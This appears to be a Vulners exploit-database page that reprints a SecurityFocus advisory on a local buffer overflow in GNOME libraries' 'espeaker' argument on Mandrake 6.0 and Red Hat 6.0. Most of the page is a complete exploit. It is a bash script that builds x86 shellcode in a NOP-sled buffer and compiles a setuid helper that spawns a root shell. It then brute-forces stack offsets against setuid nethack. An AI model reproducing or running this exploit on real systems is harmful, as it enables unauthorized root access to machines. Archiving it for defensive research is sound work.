Vulners
Lucene search
Mandriva Linux Mandrake 6.0,Gnome Libs 1.0.8 espeaker Local Buffer Overflow
source: http://www.securityfocus.com/bid/663/info
A buffer overflow vulnerabilityin GNOME's shared libraries handling of the 'espeaker' command line argument may allow local users to attack setuid binaries linked against these libraries to obtain root access.
Calling a program linked against GNOME with the command like arguments '--enable-sound --espeaker=<80 byte buffer>' results in a buffer overflow.
One known setuid root program linked against these libraries in the Mandrake 6.0 distribution is '/usr/games/nethack'.
It is likely this is a vulnerability in the libesd shared library instead of libgnome. In that case esound 0.2.8 would be vulnerable.
#!/bin/bash
# Generic exploit for GNOME apps under Linux x86
# Our overflowed buffer is just 80 bytes so we'll have to get our settings
# just so. Hence the shell script.
#
# This should work against any su/gid GNOME program. The only one that comes
# with RH6.0 that is su/gid root is (the irony is killing me) nethack.
#
# Change the /usr/games/nethack statement in the while loop below to exploit
# a different program.
#
# -Brock Tellier [email protected]
echo "Building /tmp/gnox.c..."
cat > /tmp/gnox.c <<EOF
/*
* Generic GNOME overflow exploit for Linux x86, tested on RH6.0
* Will work against any program using the GNOME libraries in the form
* Keep your BUFSIZ at 90 and only modify your offset
*
*/
#include <stdlib.h>
#include <stdio.h>
char gnoshell[]= /* Generic Linux x86 shellcode modified to run our
program */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/gn";
#define LEN 120
#define BUFLEN 90 /* no need to change this */
#define NOP 0x90
#define DEFAULT_OFFSET 300
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char *argv[]) {
int offset, i;
int buflen = BUFLEN;
long int addr;
char buf[BUFLEN];
char gnobuf[LEN];
if(argc > 2) {
fprintf(stderr, "Error: Usage: %s <offset>\n", argv[0]);
exit(0);
}
else if (argc == 2){
offset=atoi(argv[1]);
}
else {
offset=DEFAULT_OFFSET;
}
addr=get_sp();
fprintf(stderr, "Generic GNOME exploit for Linux x86\n");
fprintf(stderr, "Brock Tellier [email protected]\n\n");
fprintf(stderr, "Using addr: 0x%x buflen:%d offset:%d\n", addr-offset,
buflen, offset);
memset(buf,NOP,buflen);
memcpy(buf+35,gnoshell,strlen(gnoshell));
for(i=35+strlen(gnoshell);i<buflen-4;i+=4)
*(int *)&buf[i]=addr-offset;
sprintf(gnobuf, "--enable-sound --espeaker=%s", buf);
for(i=0;i<strlen(gnobuf);i++)
putchar(gnobuf[i]);
}
EOF
echo "...done!"
echo "Building /tmp/gn.c..."
cat > /tmp/gn.c <<EOF
#include <unistd.h>
void main() {
printf("before: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());
setreuid(geteuid(), geteuid());
setregid(getegid(), getegid());
printf("after: uid=%d, euid=%d, gid=%d, egid=%d\n", getuid(),
geteuid(), getgid(), getegid());
system("/bin/bash");
}
EOF
echo "...done!"
echo "Compiling /tmp/gnox..."
gcc -o /tmp/gnox /tmp/gnox.c
echo "...done!"
echo "Compiling /tmp/gn..."
gcc -o /tmp/gn /tmp/gn.c
echo "...done!"
echo "Launching attack..."
offset=0
while [ $offset -lt 10000 ]; do
/usr/games/nethack `/tmp/gnox $offset`
offset=`expr $offset + 4`
done
echo "...done!"
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1